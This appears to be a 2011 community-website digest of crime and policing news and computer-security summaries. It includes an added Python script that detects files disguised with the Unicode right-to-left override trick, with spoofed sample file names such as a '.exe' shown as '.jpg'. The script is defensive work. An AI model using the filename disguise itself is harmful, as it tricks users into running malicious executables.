(BBC News, dated 19th October 2011)
www.bbc.co.uk

More than 500 cars have been seized and 66 people arrested so far in an operation targeting uninsured drivers in London.

The day-long operation, overseen by the Metropolitan Police Commissioner Bernard Hogan-Howe, is also designed to disrupt other criminal activity.

Up to 80% of uninsured drivers were involved in other crimes, he said.

Incidents of uninsured driving on Merseyside fell by 40% after Mr Hogan-Howe used the measure there.

"[Uninsured drivers] are also more likely to be involved in crashes and have unsafe cars, so we're taking this action to make London's roads safer," the commissioner added.

"This is the first of the operations I have asked for where officers across the Met will spend a dedicated day on a regular basis targeting uninsured drivers and those believed to be connected to crime."

Roadside checks
 
The arrests were made for crimes including possessing drugs or an offensive weapon, driving whilst disqualified and driving while wanted on an arrest warrant.

The operation, which involved 1,000 officers, also led to a stolen lorry being stopped in Horseferry Road, Westminster, central London, a few minutes after it was reported stolen.

Cannabis, a large bundle of cash and a lock knife were found when a car was searched in Harleyford Road, Kennington, south London.

Roadside checkpoints using automatic number plate recognition have been deployed.

Uninsured vehicles have been impounded and could be destroyed, while offenders will be prosecuted.

The penalty for driving a vehicle without insurance is six penalty points and a £200 fine and can lead to a driving ban.

According to the Motor Insurers' Bureau, uninsured drivers increase other motorists' annual insurance premiums by £30.

They are also said to be five times more likely to be involved in road collisions.

'Direct approach'
 
In 2010 Scotland Yard seized 34,000 vehicles and prosecuted thousands of people who had no car insurance.

Jenny Jones, a Green Party Assembly Member who has campaigned on the issue, said: "It's great to see the new Met Commissioner taking a direct approach to tackle the problem of illegal drivers.

"I want the commissioner to stick to his suggestion that London should be doing exactly what he achieved in Merseyside.

"We need to take nearly three times as many vehicles off the road as we do now."

She added: "If we really want to crack down on the problem, we're going to have to take almost 100,000 illegal vehicles off the road each year."

(24th October 2011)


 

POLICE LAUNCH AUTUMN CRIME CRACKDOWN
(Courtesy of Metropolitan Police, dated 17th October 2011)
www.met.police.uk

With Halloween and Bonfire Night around the corner, the Metropolitan Police Service (MPS) today, Monday 17 October, commences its seasonal crackdown on crime and anti-social behaviour.

With both these events approaching, the focus of the MPS will be on ensuring the safety of our communities throughout this period.

Commander Christine Jones said: "We are here for London and to help make sure that everyone can enjoy the festivities and stay safe.

"All 32 London boroughs have a local plan in place, drawing together experience and successful tactics from previous years as well as managing planned events in their areas, focusing our resources in the right places and working closely and continually with our partners and communities.

"I would like to stress that our operations are not aimed at demonising young people, the large majority of whom behave safely and responsibly. However those intent on committing crime and anti-social behaviour will face the consequences."

In the period leading up to half term, schools officers have been reiterating safety tips to young people ahead of the festivities.

Officers are carrying out after-school patrols at key locations, such as town centres and transport hubs, to disrupt potential involvement in robbery, violence and other criminal activities which impact on our neighbourhoods.

They will also be using screening arches, as well as 'wands', as part of wider detection tactics to deter the carriage of weapons and will take part in test sale operations with Trading Standards regarding the sale of fireworks, alcohol and over-the-counter weapons.

Boroughs will receive central support for their operations, including mobile police units that will be deployed in response to particular threats. This additional support is controlled and directed from the MPS Central Command Complex [one of the three MPS 999 centres].

All Safer Neighbourhoods Teams will be patrolling at key times in town centres and other key locations.

In addition, the MPS Safer Transport Command, funded by Transport for London (TfL), is concurrently running Operation Safebus, an intensive two-week operation to prevent youth disorder on the transport network during the autumn half term and encompassing Halloween and Bonfire Night.

Commander Jones added: "During this busy period, ensure you stay safe by staying with others and try to attend well organised events.

"When you are out, keep your valuables and high-value mobile phones out of sight, or leave them at home.

"If trick or treating, be aware of the impact of your actions on others - it may cause unnecessary worry to some of the more vulnerable members of our communities. Wherever possible parents should try to accompany their children.

"If you have any concerns, do not hesitate to contact your local Safer Neighbourhoods Team or in an emergency always dial 999.

"Do not forget the security of your home. If you are going out for the evening, ensure you have closed and locked your doors and windows and make sure that you leave lights on. The clocks go back on 30 October, so it may be dark before you expect it."

Kit Malthouse, Deputy Mayor for Policing, added: "We want people to enjoy themselves and also to ensure everyone feels safe going about their business and in their communities.

"London remains one of the safest cities to go out at night, but of course you should also employ common sense and be aware of what's happening around you.

"For the minority of people that might cause trouble, this will not be tolerated and the police will be ready to respond, quickly and decisively."

Key safety advice:

Advice to parents and carers:

- Make sure you know where your children are and who they are with.
- Go with them trick or treating if you can.
- Keep fireworks in a safe place in the house.
- Report any anti-social behaviour or concerns to your Safer Neighbourhoods Team.
- Attend organised events wherever possible.

Advice to young people:

- We want you to enjoy yourselves but won't tolerate unacceptable behaviour or anti-social behaviour.
- Ensure you are safe by staying with others.
- Attend organised events wherever possible.
- When trick or treating avoid knocking on the doors of elderly or vulnerable neighbours and causing unnecessary worry.

Keeping your home secure:

- Close and lock all your doors and windows, even if you are only going out for a few minutes.
- Make sure UPVC doors are properly locked with a key.
- Make sure the side and/or back gate is locked.
- Lock your shed or garage.
- Make sure that any valuables are out of sight.
- Leave some lights on if it will be dark before you get home.
- Don't leave your car keys or ID documents near doors, windows or your letterbox.

(24th October 2011)


 

A THIRD OF POLICE STATIONS COULD CLOSE TO PUBLIC
(Daily Mail, dated 3rd October 2011 author Chris Greenwood)
www.dailymail.co.uk  [Note 1]

More than one in three police stations may close their doors to the public within months as chief constables battle to cut costs. Many more are likely to reduce the number of hours they are open to the public as limited money is redirected to officers on the frontline.

Across 30 of the 43 forces in England and Wales, 350 of the 931 public counters at stations - 37 per cent - will be closed in the next six months.

Many more will cut the hours of public access, with 26 of the forces set to have no stations open around the clock. Crime victims will be told to contact call centres using non-emergency numbers, fill in internet forms or email the force.

Senior officers point out that many police stations have few visitors and people are increasingly turning to the telephone and internet to get in touch. They add that many are in Victorian buildings that are expensive to maintain and inadequate for modern policing.

Police counters are springing up in many areas, often in civic buildings such as libraries, leisure centres and town halls.

In some forces police chiefs are trying to recruit volunteers to man police stations in a last-ditch bid to keep them open. But they face substantial problems finding willing recruits, with such plans in Birmingham being abandoned last month after no one came forward.

Nine forces admitted that half of their stations will close their doors. In London, up to 104 of its 136 stations may shut. Senior figures are considering proposals to only keep open one 24-hour station in each of the capital's 32 boroughs. In Manchester, South Yorkshire and Durham, at least six out of ten stations will no longer be open to the public.

The force in Devon and Cornwall has already ended public access at 36 of its 57 stations. Gloucestershire has closed 15 out of 29 public counters. In their place, the force has set up 11 'police points' in civic buildings, where appointments can be made to meet officers. Lancashire plans to close the doors at 21 of its 38 stations, while Essex is likely to close 21 out of 46 to the public.

Simon Reed, vice-chairman of the Police Federation, said the decision signals that 'policing is in retreat'. He said: 'This shows the lie behind the Government's policy on localism. Police officers will be working from bigger, more centralised bases and may have to travel long distances to get to their beat. 'Police stations are often a refuge for people and when these buildings are gone, they are gone forever.'

Lincolnshire Chief Constable Richard Crompton, who has national responsibility for local policing, said he and senior colleagues face tough budget choices. He said: 'All chief constables are totally committed to improving the visibility and accessibility of police officers and PCSOs, and are doing this through a range of strategies. 'Across the country we see lots of examples of premises such as libraries, community centres and supermarkets doubling up as police offices. 'Increasingly there is innovative use of the internet and social media which is making officers and staff far more accessible to the public.

'The introduction of the new non-emergency 101 telephone number across the country is again designed to improve police accessibility and contact with the public.'

(5th October 2011)


 

MET POLICE COUNTER-TERRORISM ROLE SHOULD END
(BBC News, dated 23rd September 2011)
www.bbc.co.uk

The Metropolitan Police's counter-terrorism role should be given to the new National Crime Agency when it becomes operational in 2013, MPs say.

The Home Affairs Select Committee says the change would mean less intervention in the Met by the Home Secretary and its accountability would be clearer.

It adds that uncertainty over police reforms for England and Wales could be damaging to the 43 forces. The Home Office says its plans will lead to improvements in policing.

Under the Police Reform and Social Responsibility Bill, the government set out plans to introduce police and crime commissioners, elected by the public, in place of police authorities and greater collaboration between forces.

The wide-ranging report from the cross-party committee of MPs says the scale of the reforms was unprecedented and the scope for mistakes "accordingly large".

It said it was "unacceptable" that, with the National Policing Improvement Agency being phased out next spring, there were still no definite decisions about many of its functions. It called for the NPIA closure to be delayed until the end of 2012.

But the MPs said Scotland Yard should not be given any additional national policing functions in the wake of the phone-hacking scandal, which led to the resignation of Sir Paul Stephenson as commissioner amid questions about the Met's investigation.

National services including the DNA database, the Police National Database, and the Police National Missing Persons Bureau also needed to be taken on by new organisations but such a move would not be helpful "either for it [the Met] or for the police service as a whole", it added.

The Met's Counter Terrorism Command, SO15, based at New Scotland Yard, has responsibility for protecting London and the UK from terrorism.

The Home Affairs Committee says the terrorist threat is a "national problem" and there would be "advantages" in transferring responsibility to the National Crime Agency.

"Such a change would also allow for greater clarity in the leadership and accountability of the Metropolitan Police through the Mayor of London, since there would be less justification for involvement by the Home Secretary: For example, in appointing the Metropolitan Police Commissioner," it said.

The government's police commissioner plans have already been moved from May to November next year. The MPs called for other key reforms to be delayed and in its report cited the Police Superintendents' Association's view that "it feels like pieces of the new policing jigsaw are being put together in different places without having agreed what the picture on the box should be".

They also condemned IT services in the police service as a whole as "not fit for purpose".

'Warnings ignored'
 
Keith Vaz, the committee's chairman, said: "We are deeply concerned that more than a year after the publication of the consultation paper, many of the details of the government's proposals are still unclear...

"The police perform a difficult and dangerous task on behalf of the public and the continuing uncertainty about the future of many of the bodies involved in policing has the potential to be very damaging."

Paul McKeever, Chairman of the Police Federation of England and Wales said: "The government is choosing to ignore our warnings about the impact of planned reform and more worryingly they have turned a blind eye to the public's concerns about cuts to policing.

"We are not asking the prime minister to scrap all of the plans for reform, we are simply asking that he and his cabinet pause, and take time to reflect and listen to what the men and women who police our streets are saying."

The Home Office says it will review arrangements for the Met's counter-terrorism role after the London Olympics take place next year.

Policing minister Nick Herbert added: "The police bill has just received Royal Assent, we are saving over three million hours of officer time by cutting red tape, we are driving new arrangements for forces to buy equipment and services together and converge IT, and we are just about to appoint the head of the National Crime Agency.

"We are pushing ahead with reforms which will free the police to fight crime, deliver better value for the taxpayer, and give the public a stronger voice."

Police Reform and Social Responsibility Bill :

http://www.homeoffice.gov.uk/publications/about-us/legislation/police-reform-bill/

(2nd October 2011)


 

METROPOLITAN POLICE ACTUAL STAFFING LEVELS

The following figures are from the Metropolitan Police Authority website (www.mpa.gov.uk), as of 31st August 2011.

Total London Borough Police Officers : 19,459
Total London Borough Special Constables : 4,754
Total London Borough Staff (Admin) : 3,034
Total London Borough PCSOs : 3,725

Please remember that these are the total Police Officers and support that work in each of the London Boroughs. For example for the London Borough of Enfield :

Total Enfield Borough Police Officers : 569
Total Enfield Borough Special Constables : 152
Total Enfield Borough Staff (Admin) : 79
Total Enfield Borough PCSOs : 148

When you look at the figures for the total number of Police for London Boroughs there appears to be a major disparity with what the current London Mayor (Boris Johnson) and the previous incumbent (Ken Livingstone) have always quoted. That was something around 31,500 Police Officers. This is because many of the "London" Police Officers have a wider remit and actually cover the whole UK on subjects such as Counter Terrorism and Serious Crime, as borne out by the previous article.

So of the 31,677 Police Officers on the Metropolitan Police books, 12,218 Police Officers are not necessarily walking a London beat. So perhaps in the future London politicians will quote actual figures. Then we will know what the cuts actually mean.

(2nd October 2011)


 

MORE NEWS FROM MY SPAM INBOX-SEPTEMBER !
Category : phishing
 
My Internet Service Provider's (ISP) spam filter appears to have again done a very good job this month. I have only received one suspect e-mail. Gone is the plethora of phishing e-mails purporting to be from the Halifax bank.

- From "Natwest Personal Banking"; subject "Restore your Access Online". The text of this phishing e-mail states "Our records shows that your online banking session has been blocked due to the following reasons". You are then requested to click on a bogus link and provide all of your banking details.

This e-mail is bogus and is just phishing for your personal information. If you receive it, delete it immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within the bogus e-mails.

Only receiving one phishing e-mail is suspicious in itself. For months I have received an increasing number of phishing e-mails, let alone the "pharmacy" offers of various medicinal drugs. Recently there have been several arrests of hacker groups (such as Anonymous and Lulzsec), but conversely the computing press have recently been reporting on the creation of mega-botnets (millions of corrupted computers). [A botnet is a group of computers that have been corrupted by malicious software. These computers can then work en-masse under the control of an individual or group to commit criminal activity.]

So if these botnets are not sending out phishing e-mails, what mischief are they doing ?

(30th September 2011)


 

METAL THEFT : BRITAIN'S MOST ANNOYING CRIME WAVE
(BBC News, dated 28th September 2011)
www.bbc.co.uk

A train operator wants the law changed to tackle the rise in metal thefts. But what are the serious and sometimes strange consequences of this crime wave?

One copper cable theft from a railway line. The result? A total of 108 trains delayed, 17 hours worth of hold-ups for thousands of passengers and damage put at over £80,000. Plus, probably, £50 for the thieves.

And these are the consequences of just one of three thefts in West Yorkshire on the East Coast Main Line in a single night last month.

Network Rail, which is responsible for the UK's rail infrastructure, says the situation is getting worse. On average there are currently six thefts a day across the country.

The past year has seen a huge jump in metal thefts, with a rise in the price of metals such as copper and lead being blamed. The rise is being driven by global demand prompted by China and other booming economies.

This week train operator Nexus, which runs the Metro system in Tyne and Wear, has called for new regulation of scrapyards to stop the crime wave.

The plague of metal theft is having an impact on most people, not just rail companies.

Train delays

Next time your train is delayed or cancelled due to "signalling problems" there's a good chance it will be the fault of metal thieves.

Power and signalling cables, overhead line equipment, even the clips used to hold rails in place are all being stolen on a daily basis.

The consequence for rail users was a staggering 6,088 hours of delays last year, says Network Rail. It saw a 52% leap in the number of thefts from April 2010 to April this year, in total 995 incidents. It paid out £16.5m in repairs and compensation as a result.

Even if a single inch of cable is taken it can translate into long delays, says a spokeswoman for Network Rail. Some cables have up to 48 tiny copper strands in them that all need to be reconnected at both ends and tested before things can get moving again. "We have dedicated response teams but it's not a quick job," she says.

British Transport Police say the thefts can vary greatly in size but are mostly petty - the "cottage industry end". "But the number of thefts is huge," says a spokesman. "It is our biggest crime problem in terms of frequency and our biggest challenge after counter-terrorism. "There are actually very small rewards in it for the thieves, but it's the instant cash that attracts them."

Cable thefts 2010 / 11

Scottish thefts : 192; arrests : 31
North Western thefts : 273; arrests : 109
North Eastern thefts : 1184; arrests : 273
Wales and Western thefts : 632; arrests : 218
London North thefts : 321; arrests : 112
London South thefts : 391; arrests : 94
London underground thefts : 123; arrests : 77


Fibreglass statues

Public artworks are increasingly being remade of fibreglass as a result of metal thefts. Not only is stolen work being replaced this way, in some cases public art is being taken into secure storage for safety and replaced with a fibreglass copy.

"It's a solution to an extremely depressing situation," says Peter Brown, chairman of the Public Monuments and Sculpture Association (PMSA). "What thieves don't seem to understand is how little metal there usually is in artworks and statues. They will make hardly any money from them. With the cost and effort of stealing them, you wonder why they bother."

But in some cases it is impossible to make replicas because the statues are too old and no original plans exist.

Blackpool Council has been forced to remove public artwork to safeguard it following two major thefts in July and August. Three of four lead-based figures were taken from a park where they had stood since 1926.

Two weeks later a section of one of two statues designed by Sir Peter Blake was stolen from the promenade. The remaining artworks are now in secure storage. The council says they will all be replaced with replicas.

"It's devastating," says Elaine Smith, chairwoman of the Blackpool Civic Trust. "These statues are part of Blackpool's heritage. To us they are priceless and these thieves will get a few pounds in cash for them."

It's not only artwork that is being changed. Surrey County Council now replaces missing road signs with plastic ones.

Gas explosions and power cuts

Power supply companies were the victim of around 6,000 metal thefts in 2010, equating to a 100% annual increase, according to industry figures.

One problem is that copper piping is often used to connect gas mains to gas meters in UK homes. In July a theft of copper pipes was linked to a gas explosion that wrecked a row of houses in Castleford, West Yorkshire. About 30 people had to be evacuated in the early hours of the morning.

"It's an increasing problem," says Tim Field from the Energy Network Association (ENA), the industry body for companies that carry electricity and gas to UK homes and businesses. "Thieves are taking small lengths of copper pipe that will make them a few pounds and leaving leaking gas that could cost people their lives."

Some of the pipes are on the outside of properties making them an easy target, but thieves dressed as workmen have even tricked their way into houses to strip them out.

Overhead cables and sub-stations are also targeted. Last month thieves in Wisbech, Cambridgeshire, caused an explosion which cut power to 1,700 homes. The Red Cross had to be called in to care for vulnerable residents.

"These power cuts not only cause chaos in homes, they hit hospitals and schools. It could even impact on 999 services," says Field.

Scrap dealers

The metal recycling industry in the UK is a lucrative business worth £5bn annually, but thefts are hitting it hard too. Over 15,000 tonnes of metal is stolen in the UK each year. Over half is taken from scrap dealers themselves, says Ian Hetherington, director general of the British Metals Recycling Association (BMRA).

"In one case recently thieves stole a train with two trucks full of scrap metal attached. They drove it down the line and offloaded the metal into lorries. Scrap dealers are spending a fortune on security, but the thieves are very resourceful. "Like everyone else we have seen a progressive rise in thefts since 2006, but now the recession is really taking its toll. "We are seeing a lot more smaller thefts, people who will jump over the fence, take some metal and then walk round to the front gate and try and sell it back to you."

The unexpected

Councils have reported streets being stripped of drain covers and supermarkets have lost hundreds of shopping trolleys in a matter of days. Letterboxes, charity clothing banks and door handles have also been taken.

And it seems nothing is off limits. Police have had reports of wheelchair ramps being stolen and children's playgrounds being stripped. Blackpool's model village, a popular tourist attraction, was even targeted.

"The small lead roof tiles on the miniature houses were stolen. The metal thieves are taking everything, I've never known anything like it," says Smith, from the Blackpool Civic Trust.

A quarter of Hertfordshire lost its broadband connection last year because of telecoms cable theft.

Lambeth Council in London has been forced to close a library after it was flooded in heavy rain because thieves stole the copper roof. The lead in the lettering on gravestones and memorials at a local cemetery has also been taken.

"It's appalling that thieves should target public buildings like libraries," says councillor Florence Nosegbe, a cabinet member for culture on Lambeth Council.

"But it's one thing to steal the copper from the roof of the library, it's another to damage memorials of loved ones by ripping out the lead lettering at the crematorium. This was a truly shocking and heartless act, for what would be only a few kilos of scrap metal."

(1st October 2011)


 

RUSSIAN HACKER SELLS HOME AND CARS TO PAY RBS
(BBC News, dated 20th September 2011 author Katia Moskvitch)
www.bbc.co.uk

A Russian hacker who breached the security of RBS' WorldPay service and stole $9m (£6m) has had his property sold to compensate the bank.

Viktor Pleshchuk's two flats and two cars, a BMW and a Lada, were auctioned off in Saint Petersburg on Monday.

According to a Russian news portal RIA Novosti, the sale raised 10m roubles (£200,000).

It reported that the money had been transferred to RBS, something the bank was unable to confirm.

Mr Pleshchuk and seven other Eastern European hackers managed to get their hands on the personal data of thousands of RBS customers in 2008.

They used the information to create fake debit cards and withdraw huge amounts of cash from ATMs in as many as 280 cities around the world.

The money was taken from 2,100 bank cash machines within 12 hours in the US, Russia, Estonia, Italy, Hong Kong, Japan and Canada.

Sophisticated plan
 
Kaspersky Labs chief security expert Alex Gostev said that the actual hacking was not the most complicated task the criminals had to deal with.
 
"The most interesting part was the final stage of the attack - the organisation of mass withdrawals all over the world," he said.

"They had to find more than 150 people in [numerous] cities, give each one of them the instructions and the fake cards, organise synchronised withdrawal - all of this shows that it was a group of highly skilled professionals".

Once arrested, Mr Pleshchuk pleaded guilty. In 2009, he and the rest of the hackers were also pursued by authorities in the US.

The eight were charged in the state of Georgia, where the Atlanta-based card-processing company, RBS WorldPay, was targeted.

In September 2010, Mr Pleshchuk received a six-year suspended sentence and an order to pay $8.9m (£6m) in restitution. He managed to avoid jail by pledging to sell his property and compensate the bank for the damage caused.

Online bank fraud
 
Brian Krebs, an American journalist specialising in cybercrime and computer security, recently tracked an ATM heist that was eerily similar to the RBS attack.

He explained that the attackers managed to get into the US-based FIS - Fidelity National Information Services - one of the world's largest processors of prepaid debit cards. They then planted a remote access trojan virus and used the data that they obtained to top up the reloadable prepaid debit cards they had compromised.

After that, they cloned the stolen debit cards, sent copies of them to co-conspirators in more than six countries, and raided the bank's accounts.

Mr Krebs said the FIS incident was very much like the RBS case, "clearly organised and professional". "When the funds on the cards reached close to zero, the hackers used their remote access to top up the cards again," he told BBC News. "They did this over and over and stole [millions] in less than 24 hours. These guys had access, they had a plan, and they had the means, and they executed it brilliantly."

Joseph Menn, a Financial Times reporter who covers technology-related privacy and security issues, said that similar attacks are still netting criminals millions. "The FBI said last week it is investigating online bank fraud crimes with losses totalling $85 million," said Mr Menn.

"The problem is that the technology used to commit such crimes is increasingly available and the penalties, as we have seen with the Pleshchuk case, are extremely light even in the rare event of an arrest, due largely to corruption.

"From a cost-benefit perspective, there is no reason for criminal enterprises not to double their bets on international bank crimes, so the problem will continue to get worse."

(21st September 2011)


 

CYBERCRIME CONFUSION MAY BE COSTING ECONOMY BILLIONS, SAYS THINKTANK
(The Guardian, dated 14th September 2011, author Nick Hopkins)
www.guardian.co.uk  [Note 1]

Widespread confusion over the scale and nature of cyber-criminality is undermining efforts to tackle a menace that may be costing the economy billions of pounds a year, a report has warned.

The study says the government must take a firmer lead and provide people with clearer advice about what they should be doing to protect themselves from online fraud and theft.

Businesses have been at fault, too, it says, with company bosses delegating responsibility to IT specialists within their firms in a deliberate effort to keep a problem they may not understand "at arm's length".

The report, from the Chatham House thinktank, sets out how concern over a "vast" number of cyber-threats has led to a clamour for government and big business "to do something".

But this has proved difficult because, it says, "there is, in short, no agreement on the nature and gravity of the problem" and "little sense of governmental vision or leadership" either.

"The issue of cyber-risks needs to be made accessible for those who are neither familiar with technology nor highly IT-literate," the study warns.

It focuses on the potential vulnerability of those things deemed part of the "critical national infrastructure" (CNI). Among these are the emergency and health services and those businesses that provide energy, food, transport and water.

This report argues that the CNI could now include Google and Amazon because both have become integral to "the functioning of a complex modern economy".

Its authors approached 100 of the UK's top businesses and banks. They found many staff believed cyber-threats were already out of control, with one bank claiming criminals were trying to "groom" members of staff to "compromise their corporate loyalty."

The report says: "One financial institution reported that the volume and sophistication of threats are now outstripping the organisation's capacity to respond.

"An interviewee at one major high street bank was distinctly lacking in optimism, noting that there seemed to be 'no natural predator to the bad guys' and predicting gloomily that 'we have crossed the Rubicon; we are not going to keep ahead of this.'"

But while there seems to be a consensus that the problem is growing, many companies appear to be taking it less than seriously, the report states.

"In most cases, they declared themselves to be aware of cyber-security threats. Yet these same organisations were willing … to accept an unexpectedly high level of risk. In several cases it was even decided that cyber-risk should be managed at arm's length from … the board and senior management. Paradoxically … a heightened perception of cyber-security risk is being met with diminished resources and interest."

The thinktank says some executives were guilty of having "deliberately pushed [the cyber problem] below the boardroom level in order to remove a complex and baffling problem from sight". Other senior managers seemed completely unaware of the danger to their firms.

The report concludes that ministers must play "an integral role in informing wider society and raising levels of awareness" because there is no coherent picture of what is being targeted, and by whom; nor is there any clarity over which systems and services are potentially vulnerable to cyber-attack.

Last year's Strategic Defence and Security Review ringfenced an additional £650m to bolster the UK's cyber-defences, describing the issue as being of "tier-one" importance - the highest priority.

Earlier this year, a Cabinet Office-commissioned report put the annual cost of cyber-crime at £27bn, but some experts questioned the findings. They were concerned that the study involved Detica, a security firm that is part of the arms manufacturer BAE Systems. Detica funded the Chatham House report but the company was not involved either in researching or writing the study.

(20th September 2011)


 

CURRENT COMPUTER SECURITY NEWS

All the links under this heading are [Note 1]

The following 18 summaries of articles provide examples of what threats you may encounter during your "technological" day. These include using a computer or mobile at home or work. Some of the articles describe calamities suffered by organisations who should have known better!

The articles span a period of 3 months, the first one is the most recent.

BOT ARMY BEING ASSEMBLED, AWAITING ORDERS

Full article : http://cwonline.computerworld.com/t/7576556/930454165/531201/0/

A mammoth army of infected computers is being assembled, but it's unclear yet what purpose they will be put to.

Wave after wave of malicious email attachments has been sent out since August, and with average success rates for such mailings, millions of machines could be compromised. Once infected, the computers can be loaded with additional malware that can perform a range of activities, including spamming, participating in DDoS attacks, stealing bank credentials and compromising email and social-network accounts.

 

HACKERS FLIP CHARACTERS TO DISGUISE MALWARE

Full article : http://cwonline.computerworld.com/t/7555041/930454165/529662/0/

Hackers are using a new trick to cloak malicious files by disguising their Windows file extensions to make them appear safe to download, a Czech security company warned today.

The exploit, dubbed "Unitrix" by Avast Software, abuses Unicode for right-to-left languages -- such as Arabic or Hebrew -- to mask Windows executable files (.exe) as innocuous graphic images (.jpg) or Word documents (.doc).

Unicode is the computer industry standard for representing text with alpha-numeric codes.

The Unitrix exploit uses a hidden code (U+202E) that overrides right-to-left characters to display an executable file as something entirely different. Using that ploy, hackers can disguise a malicious file that ends with gpj.exe as a supposedly-safer photo_D18727_Collexe.jpg by reversing the last six characters of the former.
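A check a mail gateway or download scanner could run against the trick described above, as an added example that is not code from the article or from Avast. The function names, the list of executable extensions and the sample file names (other than the article's own photo_D18727_Coll example) are assumptions made for illustration, and the display model is a simplification of the Unicode bidirectional algorithm.

```python
import os

# Unicode bidirectional formatting controls; none belongs in a file name.
BIDI_CONTROLS = {
    "\u200e": "LRM", "\u200f": "RLM",
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}
RLO, PDF = "\u202e", "\u202c"

# Illustrative (not exhaustive) Windows extensions that run code when opened.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd"}


def displayed_name(name):
    """Approximate what a file manager draws for `name`.

    Simplified model, not the full bidi algorithm: text after U+202E is
    drawn reversed until U+202C or the end of the name, and every other
    bidi control is invisible.
    """
    shown, run = [], None              # run holds characters inside an RLO span
    for ch in name:
        if ch == RLO:
            if run is not None:        # a second RLO: flush the open span first
                shown.extend(reversed(run))
            run = []
        elif ch == PDF and run is not None:
            shown.extend(reversed(run))
            run = None
        elif ch in BIDI_CONTROLS:
            continue
        elif run is not None:
            run.append(ch)
        else:
            shown.append(ch)
    if run is not None:
        shown.extend(reversed(run))
    return "".join(shown)


def inspect_filename(name):
    """Compare the extension stored in the name with the one the user sees."""
    controls = [BIDI_CONTROLS[ch] for ch in name if ch in BIDI_CONTROLS]
    stored = "".join(ch for ch in name if ch not in BIDI_CONTROLS)
    real_ext = os.path.splitext(stored)[1].lower()
    shown = displayed_name(name)
    shown_ext = os.path.splitext(shown)[1].lower()
    if controls and real_ext in EXECUTABLE_EXTENSIONS:
        verdict = "block"              # hidden control plus an executable type
    elif controls:
        verdict = "review"             # control characters alone are suspicious
    else:
        verdict = "ok"
    return {"stored": stored, "shown": shown, "real_ext": real_ext,
            "shown_ext": shown_ext, "controls": controls, "verdict": verdict}


if __name__ == "__main__":
    # Constructed sample names; the first reproduces the article's example.
    samples = [
        "photo_D18727_Coll\u202egpj.exe",
        "report\u202ecod.scr",
        "notes\u200f.txt",
        "holiday.jpg",
        "\u05ea\u05de\u05d5\u05e0\u05d4.jpg",   # genuine Hebrew name, no controls
    ]
    for sample in samples:
        result = inspect_filename(sample)
        print("%-7s shown=%-26s real=%-5s controls=%s" % (
            result["verdict"], result["shown"], result["real_ext"],
            ",".join(result["controls"]) or "-"))
```

Names written in right-to-left scripts pass this check because it keys on the invisible formatting controls, not on Arabic or Hebrew letters.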

 

HACKERS STEAL SSL CERTIFICATES FOR CIA, MI6 AND MOSSAD

Full article : http://cwonline.computerworld.com/t/7548091/930454165/529288/0/

The tally of digital certificates stolen from a Dutch company in July has exploded to more than 500, including ones for intelligence services like the CIA, the U.K.'s MI6 and Israel's Mossad, a Mozilla developer said Sunday.

The confirmed count of fraudulently-issued SSL (secure socket layer) certificates now stands at 531, said Gervase Markham, a Mozilla developer who is part of the team that has been working to modify Firefox to block all sites signed with the purloined certificates.

Among the affected domains, said Markham, are those for the CIA, MI6, Mossad, Microsoft, Yahoo, Skype, Facebook, Twitter and Microsoft's Windows Update service.

 

MAN GETS 6 YEARS FOR HACKING VICTIMS' COMPUTERS TO EXTORT PHOTOS

Full article : www.computerworld.com/s/article/9219701


A 32-year-old paraplegic was sentenced to six years in prison for infecting more than 100 computers in a quest for financial information, nude photographs and thrills.

Luis Mijangos worked as a freelance computer consultant in Santa Ana, California, earning about $1,000 per week writing programs and building websites. But he lived a double life, also earning as much as $3,000 per day hacking and stealing financial information from his victims.

 

HACKERS MAY HAVE STOLEN OVER 200 SSL CERTIFICATES

Full article : www.computerworld.com/s/article/9219663

Hackers may have obtained more than 200 digital certificates from a Dutch company after breaking into its network, including ones for Mozilla, Yahoo and the Tor project, a security researcher reported today.

 

BRACE FOR EMAIL-ATTACHMENT MALWARE SPREE

Full article : http://cwonline.computerworld.com/t/7499644/930454165/526189/0/

A sizeable spike in malicious email attachments is just subsiding, but if history is any indicator, several smaller spikes are about to follow that use even more deceptive means than their predecessors.

The recent surge, fueled in large part by a flood of phony messages from UPS, is similar to one observed at the end of March in that the messages urge recipients to open an attachment that releases the malware on victims' machines, according to Internet security firm Commtouch.

The earlier wave used a wider variety of package-delivery services as senders, including FedEx and DHL, but the latest outbreak employs a wider variety of messages such as, "Dear client, recipient's address is wrong", "Dear User, Delivery Confirmation: FAILED", and "Dear Client, We are not able to delivery [sic] the postal package", according to the Commtouch blog. All the messages then instruct the recipient to open the attachment that contains the malware, claiming it is an invoice or a form that needs to be filled out.

FIRED TECHY CREATED VIRTUAL CHAOS AT PHARMACEUTICAL COMPANY

Full article : http://cwonline.computerworld.com/t/7498945/930454166/526096/0/

Logging in from a McDonald's restaurant, a former employee of a U.S. pharmaceutical company was able to wipe out most of the company's computer infrastructure earlier this year.

Jason Cornish, 37, formerly an IT staffer at the U.S. subsidiary of Japanese drug-maker Shionogi, pleaded guilty Tuesday to computer intrusion charges in connection with the attack on Feb. 3, 2011. He wiped out 15 VMware host systems that were running e-mail, order tracking, financial and other services for the Florham Park, New Jersey, company.

"The Feb. 3 attack effectively froze Shionogi's operations for a number of days, leaving company employees unable to ship product, to cut checks, or even to communicate via e-mail," the U.S. Department of Justice said in court filings. Total cost to Shionogi: US$800,000.

Cornish had resigned from the company in July 2010 after getting into a dispute with management, but he had been kept on as a consultant for two more months.

Then, in September 2010, the drug-maker laid off Cornish and other employees, but it did a bad job of revoking passwords to the network. One employee, who was Cornish's friend and former boss, allegedly refused to hand over network passwords to company officials and eventually was fired because of this.

CHINA HIT BY 480,000 TROJAN HORSE ATTACKS IN 2010

Full article : http://cwonline.computerworld.com/t/7484923/930454165/525247/0/

China said it saw close to 480,000 Trojan horse attacks in 2010, with almost half originating from outside the country, according to a government security agency.

China's National Computer Network Emergency Response Technical Team (CNCERT) released some of the figures Tuesday from an upcoming annual report. Of the 221,000 attacks that originated outside of China, 14.7% came from the U.S., while another 8.8% came from India.

The figures have gained media attention after security vendor McAfee reported a massive cyber attack that stole sensitive information from 72 companies and organizations. While McAfee did not name the group behind the hacking attempts, analysts suspect China is behind the attack because of the targets involved.



